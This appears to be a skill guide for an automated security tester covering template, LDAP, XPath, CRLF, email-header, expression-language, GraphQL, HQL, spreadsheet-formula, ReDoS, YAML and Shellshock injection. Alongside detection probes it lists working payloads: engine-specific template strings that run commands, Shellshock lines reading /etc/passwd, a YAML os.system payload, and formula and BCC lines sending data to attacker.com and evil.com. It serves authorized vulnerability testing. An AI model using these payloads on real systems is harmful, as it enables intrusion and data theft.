Injection Testing Skill (Miscellaneous)
Purpose
Validate miscellaneous injection vulnerabilities by sending crafted payloads to user-controlled inputs and observing:
- Template evaluation (SSTI)
- Query manipulation (LDAP, XPath, XQuery, GraphQL, ORM/HQL)
- Header manipulation (CRLF, HTTP Header, Email Header)
- Expression/code evaluation (EL, OGNL, Spring EL, JavaScript eval)
- Resource exhaustion (ReDoS)
- Formula execution (CSV/Spreadsheet injection)
- Config manipulation (YAML, Environment variables)
Scope Note
This skill covers injection types WITHOUT dedicated skills.
For the following, use the dedicated skills:
- SQL Injection →
sql-injection-testing - NoSQL Injection →
nosql-injection-testing - Cross-Site Scripting (XSS) →
xss-testing - XML External Entity (XXE) →
xxe-testing - OS Command Injection →
command-injection-testing
Vulnerability Types Covered
1. Server-Side Template Injection - SSTI (CWE-1336)
Inject template expressions that execute on server.
Detection Methods:
- Math evaluation:
{{7*7}}returns49in response - Engine fingerprinting: Different payloads for Jinja2, Twig, Freemarker, Velocity, Pebble, Thymeleaf
Common Payloads by Engine:
| Engine | Detection Payload | RCE Payload Example |
|---|---|---|
| Jinja2 (Python) | {{7*7}} | {{config.__class__.__init__.__globals__['os'].popen('id').read()}} |
| Twig (PHP) | {{7*7}} | {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} |
| Freemarker (Java) | ${7*7} | <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} |
| Velocity (Java) | #set($x=7*7)$x | #set($e="")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime"... |
| Thymeleaf (Java) | ${7*7} | ${T(java.lang.Runtime).getRuntime().exec('id')} |
| Pebble (Java) | {{7*7}} | (Limited sandbox escape) |
| Smarty (PHP) | {7*7} | {system('id')} |
| ERB (Ruby) | <%= 7*7 %> | <%= system('id') %> |
2. LDAP Injection (CWE-90)
Manipulate LDAP queries via special characters.
Detection Methods:
- Wildcard bypass:
*returns all entries - Filter manipulation:
)(cn=*)modifies filter logic - Boolean-based:
)(|(password=*))vs normal query
Test Payloads:
*
*)(&
*)(|(&
admin)(|(password=*))
admin)(!(&(1=0
*))%00
3. XPath Injection (CWE-643)
Manipulate XPath queries in XML-based applications.
Detection Methods:
- Boolean-based:
' or '1'='1returns all nodes - Error-based:
'causes XPath syntax error - Union-style:
' or count(//*)>0 or '1'='1
Test Payloads:
' or '1'='1
' or ''='
1 or 1=1
'] | //user/*[contains(*,'
' or count(//*)>0 or '1'='1
4. XQuery Injection (CWE-652)
Manipulate XQuery expressions in XML databases.
Detection Methods:
- Similar to XPath; targets XQuery-capable systems (eXist-db, MarkLogic, BaseX)
Test Payloads:
' or '1'='1
') or ('1'='1
for $x in doc("users.xml")//user return $x
5. CRLF / HTTP Header Injection (CWE-93, CWE-113)
Inject carriage return/line feed to manipulate HTTP headers.
Detection Methods:
- Response splitting:
%0d%0aSet-Cookie:injected=valueadds header - Header injection:
%0d%0aX-Injected:headerappears in response headers - Host header poisoning: Manipulated Host header affects redirects/URLs
Test Payloads:
%0d%0aInjected-Header:value
%0d%0aSet-Cookie:session=hijacked
%0d%0a%0d%0a<html>Injected Body</html>
\r\nX-Injected:true
6. Email Header Injection (CWE-93)
Inject headers into email messages via SMTP.
Detection Methods:
- BCC injection:
victim@test.com%0ABcc:attacker@evil.comadds BCC - Subject manipulation:
%0ASubject:Spoofedchanges subject
Test Payloads:
victim@test.com%0ABcc:attacker@evil.com
victim@test.com\r\nBcc:attacker@evil.com
test%0ACc:attacker@evil.com
test\nSubject:INJECTED
7. Expression Language Injection (CWE-917)
Inject EL expressions in Java-based frameworks (Spring, JSP, OGNL).
Detection Methods:
- Math evaluation:
${7*7}or#{7*7}returns49 - Object access:
${applicationScope}leaks data
Test Payloads by Framework:
| Framework | Detection | Notes |
|---|---|---|
| Spring EL | ${7*7}, #{7*7} | Double resolution in older versions |
| OGNL (Struts) | %{7*7}, ${7*7} | Many CVEs (Struts2) |
| JSP EL | ${7*7}, #{7*7} | Standard Java EE |
| MVEL | ${7*7} | Used in some workflow engines |
8. JSON/JavaScript Eval Injection (CWE-94, CWE-95)
Inject JavaScript expressions into server-side evaluation contexts (Node.js or embedded JS engines) where user input is passed to eval(), Function(), vm.runInNewContext, or similar.
Detection Methods:
- Math evaluation:
7*7returns49(computed, not echoed) - Built-in evaluation:
Math.imul(7,7)returns49 - Structure evaluation:
['a','b'].lengthreturns2
Test Payloads (detection-only):
7*7
Math.imul(7,7)
['a','b'].length
JSON.stringify({a:1})
Safety: Treat any server-side JavaScript evaluation as high-risk; stop at detection-only payloads.
9. GraphQL Injection (CWE-74, CWE-89 variant)
Manipulate GraphQL queries for data exfiltration or DoS.
Detection Methods:
- Introspection abuse:
{__schema{types{name}}}reveals schema - Batching attacks: Multiple queries in single request
- Nested query DoS: Deep nesting causes resource exhaustion
- Field suggestion: Error messages reveal valid fields
Test Payloads:
{__schema{queryType{name}}}
{__schema{types{name,fields{name}}}}
query{user(id:"1' OR '1'='1"){name}}
{user(id:1){friends{friends{friends{name}}}}}
10. ORM/HQL Injection (CWE-89 variant, CWE-943)
Inject into ORM queries beyond basic SQL (Hibernate HQL, JPA JPQL, Django ORM).
Detection Methods:
- HQL-specific syntax:
' and 1=1 --in Hibernate - JPQL injection: Concatenated JPQL strings
- Django ORM:
__field lookup manipulation
Test Payloads:
' or 1=1 --
' and substring(username,1,1)='a
admin' AND (SELECT COUNT(*) FROM User)>0 AND '1'='1
11. CSV/Formula Injection (CWE-1236)
Inject spreadsheet formulas into exported CSV/Excel files.
Detection Methods:
- Formula execution:
=1+1or=cmd|'/C calc'!A0in exported data - DDE injection:
=IMPORTXML(...)data exfiltration
Test Payloads (detection only):
=1+1
=SUM(1,2)
+1+1
-1+1
@SUM(1+1)
=cmd|'/C calc'!A0
=HYPERLINK("http://attacker.com/?data="&A1)
Note: Test only in isolated environments; formulas can execute on user machines.
12. Regex Injection / ReDoS (CWE-1333)
Inject patterns causing catastrophic backtracking in regex engines.
Detection Methods:
- Time-based: Malicious pattern causes significant delay
- Resource exhaustion: CPU spike from nested quantifiers
Test Payloads:
(a+)+$
((a+)+)+$
(a|a)+$
([a-zA-Z]+)*$
(.*a){x} (where x is large, e.g., 20)
Target input for (a+)+$: aaaaaaaaaaaaaaaaaaaaaaaa!
13. YAML/Config Injection (CWE-502 related)
Inject YAML constructs for config manipulation (non-deserialization scenarios).
Detection Methods:
- Anchor abuse:
*aliasreferences in YAML - Merge key injection:
<<:merges dictionaries - Multi-document:
---separates documents
Test Payloads:
key: !!python/object/apply:os.system ['id']
<<: *dangerous_anchor
admin: true
---
override: value
14. Shellshock/Environment Variable Injection (CWE-78 variant)
Inject into environment variables processed by bash.
Detection Methods:
- Function injection:
() { :; }; echo VULNERABLE - CGI exploitation: Via User-Agent, Referer headers to CGI scripts
Test Payloads:
() { :; }; echo SHELLSHOCK
() { :; }; /bin/sleep 5
() { :;}; /bin/cat /etc/passwd
Prerequisites
- Target application running and reachable
- Identified injection points (parameters, headers, body fields)
- VULNERABILITIES.json with suspected injection findings if provided
Testing Methodology
Phase 1: Identify Injection Points
Analyze for potential injection vectors:
- URL parameters: Query strings, path segments
- POST body: JSON, form data, GraphQL queries
- HTTP headers: User-Agent, Referer, X-Forwarded-For, Host, Cookie
- File exports: CSV downloads, report generation
- Email functionality: Contact forms, notification systems
- Template rendering: User-controlled content in pages/emails
- Search/filter features: Often use LDAP, XPath, or custom queries
Phase 2: Establish Baseline
Send normal request and record:
- Response time (for time-based detection)
- Response content/length (for boolean-based detection)
- HTTP status code
- Response headers (for header injection)
Phase 3: Execute Injection Tests
SSTI Test:
payloads = ["{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}", "{7*7}"]
for payload in payloads:
resp = get(f"/template?name={quote(payload)}")
if "49" in resp.text:
status = "VALIDATED"
engine = identify_engine(payload)
LDAP Injection Test:
baseline = get("/search?user=john")
test = get("/search?user=*")
if len(test.text) > len(baseline.text) * 5:
status = "VALIDATED" # Wildcard returned all users
CRLF Injection Test:
payload = "test%0d%0aX-Injected:true"
resp = get(f"/redirect?url={payload}")
if "X-Injected" in resp.headers:
status = "VALIDATED"
EL Injection Test:
payloads = ["${7*7}", "#{7*7}", "%{7*7}"]
for payload in payloads:
resp = get(f"/page?input={quote(payload)}")
if "49" in resp.text:
status = "VALIDATED"
ReDoS Test:
baseline_time = measure("/search?pattern=test")
malicious_pattern = "(a+)+$"
malicious_input = "a" * 30 + "!"
test_time = measure(f"/search?pattern={quote(malicious_pattern)}&input={quote(malicious_input)}")
if test_time > baseline_time + 5:
status = "VALIDATED"
Phase 4: Classification Logic
| Status | Meaning |
|---|---|
| VALIDATED | Injection confirmed (eval, data leak, header added, delay) |
| FALSE_POSITIVE | Input properly sanitized |
| PARTIAL | Some indicators but not definitive |
| UNVALIDATED | Blocked, error, or insufficient evidence |
Phase 5: Capture Evidence
Capture minimal structured evidence (redact PII/secrets, truncate to 8KB, hash full response):
status,injection_type,cwe- Baseline request (url, method, status, response_time)
- Test request (url, method, status, response details)
- Payload used and detected indicator
Phase 6: Safety Rules
- Detection-only payloads (math evaluation, timing, markers)
- NEVER execute destructive commands via SSTI/EL
- Do not exfiltrate real data
- CSV formula testing only in isolated environments
- Respect rate limits; avoid causing DoS
Output Guidelines
- Keep responses concise (1-4 sentences)
- Include endpoint, payload, detection method, and impact
Validated examples:
SSTI (Jinja2) on /greet - {{7*7}} evaluated to 49. RCE possible via template engine.
LDAP injection on /search - wildcard returned 500+ users vs 1. Data exposure risk.
CRLF injection on /redirect - X-Injected header added to response. Response splitting possible.
EL injection on /page - ${7*7} evaluated in Spring EL context. Code execution risk.
GraphQL introspection on /graphql - schema exposed via __schema query. API structure revealed.
Unvalidated example:
SSTI test incomplete on /template - all payloads returned literal text. Evidence: path/to/evidence.json
CWE Mapping
Primary CWEs (DAST-testable):
- CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine (SSTI)
- CWE-90: Improper Neutralization of Special Elements used in an LDAP Query (LDAP Injection)
- CWE-643: Improper Neutralization of Data within XPath Expressions (XPath Injection)
- CWE-652: Improper Neutralization of Data within XQuery Expressions (XQuery Injection)
- CWE-93: Improper Neutralization of CRLF Sequences (CRLF Injection)
- CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers (HTTP Response Splitting)
- CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax
- CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (EL Injection)
- CWE-1333: Inefficient Regular Expression Complexity (ReDoS)
- CWE-1236: Improper Neutralization of Formula Elements in a CSV File (CSV/Formula Injection)
- CWE-94: Improper Control of Generation of Code (Code Injection)
- CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (Eval Injection)
Additional CWEs commonly implicated by covered techniques:
- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor (GraphQL introspection / verbose errors)
- CWE-400: Uncontrolled Resource Consumption (GraphQL depth/batching and ReDoS impact)
- CWE-502: Deserialization of Untrusted Data (unsafe YAML object deserialization)
- CWE-78: OS Command Injection (Shellshock-style environment variable injection)
- CWE-89: SQL Injection (ORM/HQL and GraphQL arguments reaching SQL sinks)
- CWE-564: SQL Injection: Hibernate (HQL/JPQL variants)
- CWE-943: Improper Neutralization of Special Elements in Data Query Logic (query-language injection class)
Related/Parent CWEs:
- CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection - parent)
- CWE-96: Improper Neutralization of Directives in Statically Saved Code (Static Code Injection)
- CWE-97: Improper Neutralization of Server-Side Includes (SSI Injection)
- CWE-99: Improper Control of Resource Identifiers (Resource Injection)
- CWE-116: Improper Encoding or Escaping of Output
- CWE-20: Improper Input Validation
Related Attack Patterns:
- CAPEC-250: XML Injection
- CAPEC-136: LDAP Injection
- CAPEC-83: XPath Injection
- CAPEC-34: HTTP Response Splitting
- CAPEC-105: HTTP Request Splitting
- CAPEC-15: Command Delimiters
- CAPEC-468: Generic Cross-Browser Cross-Domain Theft
Notable CVEs (examples)
- CVE-2025-66438 (Frappe ERPNext): SSTI via Print Format rendering (CVSS 9.8).
- CVE-2023-22527 (Atlassian Confluence): OGNL injection leading to RCE.
- CVE-2022-22965 (Spring4Shell): Spring EL injection via data binding.
- CVE-2021-44228 (Log4Shell): JNDI lookup injection (related to EL concepts).
- CVE-2020-17530 (Apache Struts): OGNL injection via tag attributes.
- CVE-2019-11358 (jQuery): Prototype pollution (related injection pattern).
- CVE-2017-9805 (Apache Struts): REST plugin XStream RCE.
Safety Reminders
- ONLY test against user-approved targets
- Use detection-only payloads (math eval, timing, markers)
- NEVER execute destructive commands via SSTI/EL
- Do not exfiltrate real data
- CSV formula testing only in isolated environments
- Stop if production protections trigger
Reference Implementations
- See
reference/injection_payloads.pyfor payload generators by injection type - See
reference/validate_injection.pyfor injection validation flow - See
examples.mdfor concrete scenarios and evidence formats